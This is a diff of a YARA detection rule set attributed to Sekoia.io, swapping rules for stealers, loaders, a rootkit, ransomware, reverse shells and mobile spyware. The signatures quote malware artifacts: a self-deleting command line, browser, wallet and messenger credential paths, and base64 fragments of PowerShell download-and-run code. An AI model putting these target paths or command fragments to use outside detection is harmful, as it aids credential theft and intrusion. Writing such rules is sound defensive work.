-		$str01 = "/C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A" wide
-		$str02 = "SELECT ExecutablePath, ProcessID FROM Win32_Process" wide
-		$str03 = "Apps\\Gaming\\Minecraft" wide
-		$str04 = "Apps\\Gaming\\Steam\\Apps" wide
-		$str05 = "Messengers\\Facebook\\Contacts.txt" wide
-		$str06 = "Messengers\\Discord\\Tokens.txt" wide
-		$str07 = "Apps\\VPN\\NordVPN\\accounts.txt" wide
-		$str08 = "Apps\\VPN\\DUC\\credentials.txt" wide
-		$str09 = "System\\Screenshots\\Webcam.png" wide
-		$str10 = "System\\Screenshots\\Desktop.png" wide
-		$str11 = "GTA San Andreas User Files\\SAMP\\USERDATA.DAT" wide
-		$str12 = "http://ip-api.com/line?fields=query" wide
-		$str13 = "Wireshark" wide
-		$str14 = "KeePass.config.xml" wide
-		$str15 = "Apps\\TheBat!" wide
-		$str16 = "Vulturi" wide
-		$str17 = "StealerStub" wide
+		$obf = "(function(_0x" ascii
+		$exp = "module.exports =" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( #vul > 50 or 12 of ( $str* ) )
+		$exp in ( filesize -500 .. filesize ) and #obf == 1
 }
-
-rule SEKOIA_Rootkit_Win_Purplefox_Kernel_Driver : FILE
+rule SEKOIA_Win_Malware_Statc_Downloader : FILE
 {
 	meta:
-		description = "Detect the Purple Fox trojan"
+		description = "Statc Downloader powershell script. Base64 powershell"
 		author = "Sekoia.io"
-		id = "798dc20b-76cd-4e31-b9ee-f363fb39cd58"
-		date = "2022-03-28"
+		id = "4a2e9607-635b-4cd8-ba27-d70e0c76fd45"
+		date = "2023-08-09"
 		modified = "2024-12-19"
-		reference = "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rootkit_win_purplefox_kernel_driver.yar#L3-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "91d7caca7c0c41e70813d52b5662bf0238d078fca519bfc2c03f3f87fe3805b8"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/win_malware_statc_downloader.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "173ea5af2e71b6ed70abd52a5d2f4de040393a6d2ff4978bbb6e73d96742b010"
+		logic_hash = "a99970a6ace88234e5e2bda009f8d87e6a0dc8c1a4655cca128e30292a21502c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238491,53 +239327,82 @@ rule SEKOIA_Rootkit_Win_Purplefox_Kernel_Driver : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\DosDevices\\Global\\MyDriver" wide
-		$ = "IOCTL_IO_KILL_PROCESS" ascii
-		$ = "IOCTL_IO_DELET_FILE" ascii
-		$ = "IOCTL_IO_COPY_FILE" ascii
-		$ = "IOCTL_IO_KILL_MINIFITER" ascii
+		$powershell = "powershell.exe"
+		$a1 = "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8A"
+		$a2 = "gATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvA"
+		$a3 = "oAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACIAaAB0AHQAcABzADoALw"
+		$b1 = "aQBuAHYAbwBrAGUALQBlAHgAcAByAGUAcwBzAGkAbwBuACAAIgAkAGUAbgB2ADoAVABFAE0AUABc"
+		$b2 = "kAbgB2AG8AawBlAC0AZQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAJABlAG4AdgA6AFQARQBNAFAAX"
+		$b3 = "pAG4AdgBvAGsAZQAtAGUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAF"
+		$c1 = "MQAgADEAIgA7ACAAIgBPAEsAIgA7"
+		$c2 = "EAIAAxACIAOwAgACIATwBLACIAO"
+		$c3 = "xACAAMQAiADsAIAAiAE8ASwAiAD"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or ( pe.rich_signature.toolid ( 171 , 30319 ) and pe.rich_signature.toolid ( 158 , 30319 ) and pe.rich_signature.toolid ( 170 , 30319 ) and pe.rich_signature.toolid ( 147 , 30729 ) and pe.rich_signature.toolid ( 1 , 0 ) ) and for any i in ( 0 .. pe.number_of_signatures -1 ) : ( pe.signatures [ i ] . thumbprint == "c7939f8303ca22effb28246e970b13bee6cb8043" )
+		$powershell at 0 and 1 of ( $a* ) and 1 of ( $b* ) and 1 of ( $c* ) and filesize < 1MB
 }
-rule SEKOIA_Crime_Sload_Powershellarchiveexfiltrator_Strings : FILE
+
+rule SEKOIA_Apt_Darkpink_Loader_Decryptionroutine : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects decryption routine of dark pink loader"
 		author = "Sekoia.io"
-		id = "3934696a-2116-49cb-9f75-3740767ad6f3"
-		date = "2022-08-02"
+		id = "fefc7b2f-eecc-49dc-84bc-24c45e9ea8f0"
+		date = "2023-01-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crime_sload_powershellarchiveexfiltrator_strings.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7d6234ced7e5915a5b27ce2065772c74adb5c2398a8c972421fb5ec6b1b7771f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_darkpink_loader_decryptionroutine.yar#L4-L49"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fe2726b77c293fc2aa19216025cfa2b4cd0c5194730cbc57a1fcceb6f6198977"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hashs = "3f38860d0f6f0ff1b65219379f8793383cba85b11de1c853192fb2d2ba99e481"
+		hashs = "b3f1d6366ebc184f634a240c838b39d729c28b8718b0b9ca6be988a7e446ec42"
 
 	strings:
-		$ = "if ($wr1 -or $wr2){"
-		$ = "if ($zp1 -or $zp2){"
-		$ = "-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});"
+		$chunk_1 = {
+        8A 08
+        40
+        84 C9
+        75 ??
+        6A 00
+        2B C2
+        50
+        53
+        56
+        E8 ?? ?? ?? ??
+        8A 88 ?? ?? ?? ??
+        30 0C 3E
+        83 C6 01
+        83 D3 00
+        78 ??
+        7F ??
+        81 FE ?? ?? ?? ??
+        72 ??
+        55
+        }
 
 	condition:
-		all of them and filesize < 1KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 3MB and ( all of them or hash.md5 ( pe.rich_signature.clear_data ) == "950c0710dc4cbf6e2cd6b857d25da523" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "547e43dd8560fa8b0ca0be9f633bf62d" ) )
 }
-rule SEKOIA_Loader_Amadey_Clipper_Plugin : FILE
+
+rule SEKOIA_Loader_Win_Abcloader : FILE
 {
 	meta:
-		description = "Finds Amadey's clipper plugin based on characteristic strings"
+		description = "Detect ABCloader"
 		author = "Sekoia.io"
-		id = "487b6657-8834-45ee-8fd4-03df9c0dd7be"
-		date = "2023-05-16"
+		id = "c286ce75-a041-478e-a567-4bf1d5e66c01"
+		date = "2024-08-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_amadey_clipper_plugin.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6f5a2fa9c687f0fb2423ca97540d0173551dd04b31d092e4d47d6d7d22dfb965"
+		reference = "https://nsfocusglobal.com/new-apt-group-actor240524-a-closer-look-at-its-cyber-tactics-against-azerbaijan-and-israel/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_abcloader.yar#L4-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "0d1dca5eaad49c2dbd979e1bf0b5f8d0"
+		hash = "9a640889e82407b06c546fea15be668f"
+		logic_hash = "64d171d31c2f03ac18dde61d5b57fba91448045404b0ff619fb8cd437a561b1f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238545,67 +239410,49 @@ rule SEKOIA_Loader_Amadey_Clipper_Plugin : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "CLIPPERDLL.dll" ascii
-		$str02 = "??4CClipperDLL@@QAEAAV0@$$QAV0@@Z" ascii
-		$str03 = "??4CClipperDLL@@QAEAAV0@ABV0@@Z" ascii
-		$str04 = "Main" ascii fullword
-		$str05 = "OpenClipboard" ascii
-		$str06 = "GetClipboardData" ascii
-		$str07 = "D:\\Mktmp\\Amadey\\ClipperDLL\\Release\\CLIPPERDLL.pdb" ascii
+		$ = "qSii.LI4"
+		$ = "Cabinet.dll"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "45c6b272631aa9e0c4b2ba675699b803" or hash.md5 ( pe.rich_signature.clear_data ) == "b33158757dc039859e272f4528e10e80"
 }
 
-rule SEKOIA_Wiper_Win_Isaacwiper
+rule SEKOIA_Implant_Win_Magicrat : FILE
 {
 	meta:
-		description = "Detect the IsaacWiper using multiple methods + ReversingLab rule's condition"
+		description = "Detect Lazarus' MagicRAT"
 		author = "Sekoia.io"
-		id = "b081e3a3-612e-46ae-93af-82e7ee98fcf7"
-		date = "2022-03-15"
+		id = "74973682-b214-48ee-98c3-f4b6bef76587"
+		date = "2022-09-13"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/wiper_win_isaacwiper.yar#L4-L45"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0338e11ece112b6f7d88db49cfc703a4431d7ee54f4b9ff0b9e2ea50d39cab4f"
+		reference = "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_magicrat.yar#L4-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9abc223c5ae9300b06b9161cbd9f5a501b6aaf46970b0bb74d98168792b7e659"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = "getting drives..." wide
-		$s2 = "physical drives:" wide
-		$s3 = "-- system physical drive" wide
-		$s4 = "-- physical drive" wide
-		$s5 = "logical drives:" wide
-		$s6 = "-- system logical drive:" wide
-		$s7 = "-- logical drive:" wide
-		$s8 = "start erasing physical drives..." wide
-		$s9 = "-- FAILED" wide
-		$s10 = "-- start erasing logical drive" wide
-		$s11 = "start erasing system physical drive..." wide
-		$s12 = "system physical drive -- FAILED" wide
-		$s13 = "start erasing system logical drive" wide
+		hash1 = "9dc04153455d054d7e04d46bcd8c13dd1ca16ab2995e518ba9bf33b43008d592"
+		hash2 = "c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f"
+		hash3 = "f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332"
 
 	condition:
-		pe.imphash( ) == "a4b162717c197e11b76a4d9bc58ea25d" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "06d63fddf89fae3948764028712c36d6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "48f101db632bb445c21a10fd5501e343" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5efc98798d0979e69e2a667fc20e3f24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9676f7c827fb9388358aaba3e4bd0cc6" ) or hash.md5 ( pe.rich_signature.clear_data ) == "ec862d3013903478c2ff8dce2792815f" or all of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 15MB and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "39dfb9f035cba21ffd90973904f90469" and pe.sections [ i ] . name == ".qtmetad" )
 }
-rule SEKOIA_Tool_Win_Driverjack : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "08bc0fe8-38f1-4c73-99c8-2659b4a55815"
-		date = "2024-09-11"
+		id = "c6a16ecc-e00a-4756-b603-f6c85e4f4220"
+		date = "2023-05-15"
 		modified = "2024-12-19"
-		reference = "https://github.com/klezVirus/DriverJack/blob/master/DriverJack"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_driverjack.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "649fc12915bdcdebbc3798a8ad0b9b32"
-		logic_hash = "0ea81c32b75ff66434f0c949be7d1478ce9268eb1b67dc5b7d6c7604cedcd72c"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_commonmagic_generic_2.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d3916ab749ae5b6e0a8abdc9641de13e0328809a6e20c6ce04ada5dbfb742689"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238613,128 +239460,142 @@ rule SEKOIA_Tool_Win_Driverjack : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "(*) Decrypting %llu bytes of file content using key '%s' of length %u..."
-		$ = "(*) Modifying file %s in mapped drive..."
-		$ = "(*) Checking file %s in mapped drive..."
-		$ = "(-) CreateProcess failed '%s' (%08x)."
-		$ = "(*) Mounted Drive Letter: %s"
+		$ = "\\CommonCommand\\" ascii wide
+		$ = "\\\\.\\pipe\\PipeMd" ascii wide fullword
+		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
+		$ = "\\\\.\\pipe\\PipeCrDtMd" ascii wide fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 2 of them
 }
-rule SEKOIA_Spyware_And_Strongpity_Mobile_Backdoor : FILE
+
+rule SEKOIA_Reverseshell_Win_1St_Troy : FILE
 {
 	meta:
-		description = "Detect the mobile backdoor using the name used in the certificate"
+		description = "Detect the 1st Troy Reverse Shell agent used by Andariel"
 		author = "Sekoia.io"
-		id = "58ceb85b-d94f-47b2-86e4-59bd41f4fea8"
-		date = "2023-01-16"
+		id = "b40b742d-8b1e-4d99-8df5-6cb8c9a7d8bd"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/spyware_and_strongpity_mobile_backdoor.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9005fe938433223f32642f6bbf7c4c58f0b927a006e283c8b12f79103ec02cfc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/reverseshell_win_1st_troy.yar#L4-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a85a6ef0fe3b3fde3cb833579f4fd69cd159737888ae41e69e40a6bdc1172d1f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "186a6663eb91999b3e2637898ab40034f5fcd451150c9199d9b49328e64f90b5"
+		hash2 = "5b015e69629de37507e96ce258c27479d157714121d7c622698c6d1d6b547425"
 
 	strings:
-		$s1 = "Elizabeth Mckinsen0"
+		$s1 = "1th Troy/02___Go/Reverse_Base64_Pipe"
 
 	condition:
-		all of them and filesize > 2MB
+		uint16be( 0 ) == 0x4d5a and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "657d7495796c36297ec1c13aaedf1dd3" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "debd992f27402355766cf3b5b47abe94" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "687d2535086bd055af5716760a2d87ce" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "78389349844e8d2d719603fc389779bf" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "44563b597e806af8a9ebe026c9ea6a53" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5db8685a067d106fe66292b828a2161c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1268012f292e60785825726967a4e63e" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c7b760c8b603f39a5ff9867accbad427" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d28526f9543ecf429de4a863b8901575" )
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Vba : FILE
+rule SEKOIA_Infostealer_Win_Acridrain_Mar23 : FILE
 {
 	meta:
-		description = "Detects some suspected APT28 document vba"
+		description = "Finds AcridRain samples"
 		author = "Sekoia.io"
-		id = "58040dbd-09ae-4f9e-940d-3a522e7ccfbb"
-		date = "2024-07-25"
+		id = "049b502a-0fb6-4fa9-a1ce-f01a40269bdb"
+		date = "2023-03-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_susp_apt28_uac0063_malicious_doc_vba.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "fceffb8ae94cef3af21b2943131e94db9e0e67073de48d9d32601a245448d067"
-		logic_hash = "c57676b765364c5c51d2bf231b5fe858129b45ba837ec6554b353177bb16bd8a"
-		score = 65
-		quality = 80
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_acridrain_mar23.yar#L1-L40"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7fa1822acc6264a3a58fffef3fc572f8818d99037b20d5abb8bfb41f025949d4"
+		score = 75
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 30 }
-		$ = "ThisDocument" wide
+		$str01 = "\",\"r\":" ascii
+		$str02 = "\",\"s\":\"" ascii
+		$str03 = "\",\"p\":\"" ascii
+		$str04 = "\",\"a\":\"" ascii
+		$str05 = ",\"c\":" ascii
+		$str06 = ",\"g\" :" ascii
+		$str07 = "v7166637466625297979 t2537736810932639330 ath5ee645e0 altpriv cvcv=2 cexpw=1 smf=0" ascii
+		$str08 = "Content-Type: multipart/form-data; boundary=----974767299852498929531610575" ascii
+		$str09 = "\\Roaming\\Bitwarden\\data\\bitwarden.sqlite3" ascii
+		$ste01 = "\\Roaming\\Exodus\\exodus.wallet" ascii
+		$ste02 = "\\Roaming\\Electron Cash\\wallets" ascii
+		$ste03 = "\\Roaming\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb" ascii
+		$ste04 = "\\Local Extension Settings\\" ascii
+		$ste05 = "cnmamaachppnkjgnildpdmkaakejnhae" ascii
+		$ste06 = "ffnbelfdoeiohenkjibnmadjiehjhajb" ascii
+		$ste07 = "\\formhistory.sqlite" ascii
+		$ste08 = "\\logins.json" ascii
+		$ste09 = "encrypted_key" ascii
+		$ste10 = "\\Login Data" ascii
+		$enc01 = "bX5cVw8FKyAKZVxXXUAdSTUXCXdCV0FoOxoSF0ZEUEZS" ascii
+		$enc02 = "bX5cVw8FKywUaVVbRlkyPAQAFCB1U0dV" ascii
+		$enc03 = "bX5cVw8FKzQvUBFhRkYINSIWA3IRdlJADw==" ascii
+		$enc04 = "bX5cVw8FKzYWdUVcWl8iCBU5NXBERl1dBTUiFgNyEXZSQA8=" ascii
+		$enc05 = "bWBcVQMAGQI6UEJbGGgeGxgDD2xUQW9QCw8WEAp0" ascii
 
 	condition:
-		uint32be( 0 ) == 0xd0cf11e0 and all of them
+		uint16( 0 ) == 0x5A4D and 5 of ( $str* ) and 7 of ( $ste* ) and 1 of ( $enc* )
 }
-rule SEKOIA_Ransomware_Win_Chaos : FILE
+rule SEKOIA_Apt_Unc4990_Explorer_Ps1_Reverse_B64 : FILE
 {
 	meta:
-		description = "Detects the Chaos Ransomware"
+		description = "Detects reverse base64 files (explorer.ps1)"
 		author = "Sekoia.io"
-		id = "c1876a18-0618-44e2-8919-b4a041de97e7"
-		date = "2022-01-18"
+		id = "35c3ffb2-2ced-426c-ac3f-a8cd0c357672"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_chaos.yar#L1-L46"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1947e6de8f74fe7bc52107d4a57e19eacf022121f5decee54a8c90797be844c6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unc4990_explorer_ps1_reverse_b64.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bf13fbf2dbe6a718510f3e435a9fe06517ed962f8e129d79a15e6a301e5713ca"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rep00 = "\\Desktop" wide
-		$rep01 = "\\Links" wide
-		$rep02 = "\\Contacts" wide
-		$rep03 = "\\Documents" wide
-		$rep04 = "\\Downloads" wide
-		$rep05 = "\\Pictures" wide
-		$rep06 = "\\Music" wide
-		$rep07 = "\\OneDrive" wide
-		$rep08 = "\\Saved Games" wide
-		$rep09 = "\\Favorites" wide
-		$rep10 = "\\Searches" wide
-		$rep11 = "\\Videos" wide
-		$rep12 = "C:\\Users\\" wide
-		$str0 = "svchost.exe" wide
-		$str1 = "\\privateKey.chaos" wide
-		$str2 = "Chaos Ransomware" wide
-		$str3 = "read_it.txt" wide
-		$str4 = "<EncryptedKey>" wide
-		$str5 = "passwordBytes" ascii
-		$str6 = "lookForDirectories" ascii
-		$str7 = "Rfc2898DeriveBytes" ascii
-		$str8 = "ICryptoTransform" ascii
-		$str9 = "FromBase64String" ascii
-		$ext0 = ".torrent" wide
-		$ext1 = ".ibank" wide
-		$ext2 = ".wallet" wide
-		$ext3 = ".swift" wide
-		$ext4 = ".onetoc2" wide
+		$s0 = "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\""
+		$s1 = "Wa1VHJ\"[-1..-"
+		$s2 = "-join '')))"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 50KB and filesize < 2MB and 6 of ( $str* ) and 10 of ( $rep* ) and 4 of ( $ext* )
+		all of them and $s0 at 0 and @s2 - @s2 < 20
 }
-rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_1 : FILE
+rule SEKOIA_Apt_Yemen_Apk_Guardzoo : FILE
 {
 	meta:
-		description = "Matches the Gamaredon Stealer obfuscation"
+		description = "Detects Dex files containing GuardZoo strings."
 		author = "Sekoia.io"
-		id = "a6197d16-8ed1-410b-8814-d7eff9a8096c"
-		date = "2022-02-04"
+		id = "f4004e7c-2904-46ea-a3e6-2bdd3e704fea"
+		date = "2024-08-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_stealer_obfuscation_1.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7f6a5f8af73c4eb7debbadfd22232ad4e3f44e3aae36c3d624ce7a1a050e8782"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_yemen_apk_guardzoo.yar#L1-L40"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "3afad114c68489e2d294720339baf570"
+		hash = "c59d0f5c8d00485199f147b96c5abca0"
+		hash = "75c58948725133160085dc1cfdf602ec"
+		hash = "d76a39ee85263900f7e6eaacb804f5e2"
+		hash = "51356c95dfe1221c0f4ca2475bc787f8"
+		hash = "1d0dd8201c051d9c8d2c945c8b31a48c"
+		hash = "b7b6be5e8eec44dd13e1df1f3908fcf0"
+		hash = "229984f004578a8fa643afb881d81e8c"
+		hash = "f3f1ccb3912c49a0a6ea710a0bd856de"
+		hash = "a3f8365bfa5f8185e8c7eba8efc63165"
+		hash = "7392deaf81ddf50b8a6f2179538f7e81"
+		hash = "c40d56e1586f9fa382c688d624d25525"
+		hash = "629fb04b91c4db4ea282440e20317dab"
+		hash = "bcebc41628196f8bd119f72e1e8eb47c"
+		hash = "f1cfdc9e91c3a20563246cf366b94f10"
+		hash = "a75ffb11adbace40a7c59128adba43ad"
+		logic_hash = "7d98aefa4c2ee7316e0ff47a67d9f19913852d1a451ef38ccb77709394e4ba73"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238742,24 +239603,31 @@ rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 76 61 72 20 [5-30] 3d 20 6e 65 77 20 6f 62 6a 65 63 74 5b 5d 20 7b 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 2c 20 [2-10] 20 7d 3b }
-		$s2 = { 66 6f 72 28 69 6e 74 20 [5-30] 20 3d 20 30 3b 20 [5-30] 20 3c 20 31 30 3b 20 [5-30] 2b 2b 29 }
+		$classes_1 = "GuardZoo.java"
+		$classes_2 = "com/animals"
+		$path_1 = "&Password="
+		$path_2 = "&Coordinates="
+		$path_3 = "&Data="
+		$path_4 = "&Device="
+		$path_5 = "&ISPICTURE="
+		$path_6 = "&Phone_Number="
+		$path_7 = "&Provider="
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100MB and ( #s1 > 100 or #s2 > 100 )
